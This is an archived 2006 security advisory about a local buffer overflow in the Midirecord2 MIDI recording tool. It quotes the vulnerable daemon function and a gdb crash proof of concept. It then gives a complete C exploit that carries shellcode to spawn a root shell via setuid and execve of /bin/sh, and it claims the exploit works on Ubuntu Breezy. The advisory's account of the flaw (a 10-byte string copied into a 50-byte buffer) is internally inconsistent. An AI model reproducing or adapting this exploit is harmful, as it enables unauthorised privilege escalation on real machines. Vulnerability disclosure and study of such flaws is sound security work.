AOH :: HP Unsorted M :: B06-3864.HTM

Midirecord2 buffer overflow



BufferOverflow in Midirecord2
BufferOverflow in Midirecord2



ECHO_ADV_41$2006=0D
=0D
---------------------------------------------------------------------------=0D
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2=0D
---------------------------------------------------------------------------=0D
=0D
Author       : Dedi Dwianto=0D
Date         : July, 25th 2006=0D
Location     : Indonesia, Jakarta=0D
Web : http://advisories.echo.or.id/adv/adv41-theday-2006.txt=0D 
Exploitation : Local =0D
Critical Lvl : High=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
=0D
Application : Midirecord=0D
version     : 2=0D
URL : http://tuma.stc.cx/progs.php=0D 
Description :=0D
Midirecord is a simple command-line application to record a MIDI file with your =0D
MIDI keyboard. It also features automatic recording to a MIDI file when you play =0D
electric piano, and thus it may be used as a "recording daemon".=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~~=0D
The function daemon in affected by a bufferoverflow which could allow=0D
an attacker to execute malicious code from local.=0D
The problem is caused by the copyung of a string of max 10 bytes in the filename=0D
buffer of only 50 bytes.=0D
=0D
------------------midirecord.cc-----------------------------=0D
void daemon(FILE* fin)=0D
{=0D
   char filename[50];=0D
   printf("Waiting for note-on event.\n");=0D
   while(cont)=0D
   {=0D
        unsigned char status;=0D
        fread(&status, 1, 1, fin); // read status=0D
        if(status>>4 == 0x9)=0D
        {=0D
            get_datestr(filename);=0D
            printf("Starting to record to %s.\n",filename);=0D
            recordmidi(fin, filename);=0D
            if(cont)=0D
                printf("Finished. Starting to wait for note-on event.\n");=0D
        }=0D
   }=0D
=0D
}=0D
----------------------------------------------------------=0D
=0D
POC:=0D
~~~~=0D
$gdb midirecord=0D
GNU gdb 6.3-debian=0D
Copyright 2004 Free Software Foundation, Inc.=0D
GDB is free software, covered by the GNU General Public License, and you are=0D
welcome to change it and/or distribute copies of it under certain conditions.=0D
Type "show copying" to see the conditions.=0D
There is absolutely no warranty for GDB.  Type "show warranty" for details.=0D
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".=0D
=0D
(gdb) r `perl -e 'print "A" x 10000'`=0D
The program being debugged has been started already.=0D
Start it from the beginning? (y or n) y=0D
=0D
Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x 10000'`=0D
Waiting for note-on event.=0D
=0D
Program received signal SIGSEGV, Segmentation fault.=0D
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6=0D
(gdb)=0D
=0D
-------Exploit Code-------=0D
/* Succesfull Exploit in Ubuntu Breezey */=0D
#include =0D
#include =0D
#include =0D
=0D
#define BUFSIZE 225=0D
#define ALIGNMENT 1=0D
int main(int argc, char **argv )=0D
{=0D
        char shellcode[]==0D
                "\x6a\x17\x58\x31\xdb\xcd\x80"=0D
                "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";=0D
=0D
        if(argc < 2)=0D
                 {=0D
           fprintf(stderr, "Use : %s \n", argv[0]);=0D
             return 0;=0D
             }=0D
        char *env[] = {shellcode, NULL};=0D
        char buf[BUFSIZE];=0D
                int i;=0D
                int *ap = (int *)(buf + ALIGNMENT);=0D
                int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);=0D
=0D
                for (i = 0; i < BUFSIZE - 4; i += 4)=0D
                *ap++ = ret;=0D
                execle(argv[1], "/dev/midi1", buf, NULL, env);=0D
=0D
}=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~~=0D
=0D
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous=0D
~ My Lovely Jessy=0D
~ newbie_hacker@yahoogroups.com=0D 
~ #aikmel #e-c-h-o @irc.dal.net=0D 
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~~=0D
=0D
     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id=0D
Homepage: http://theday.echo.or.id/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.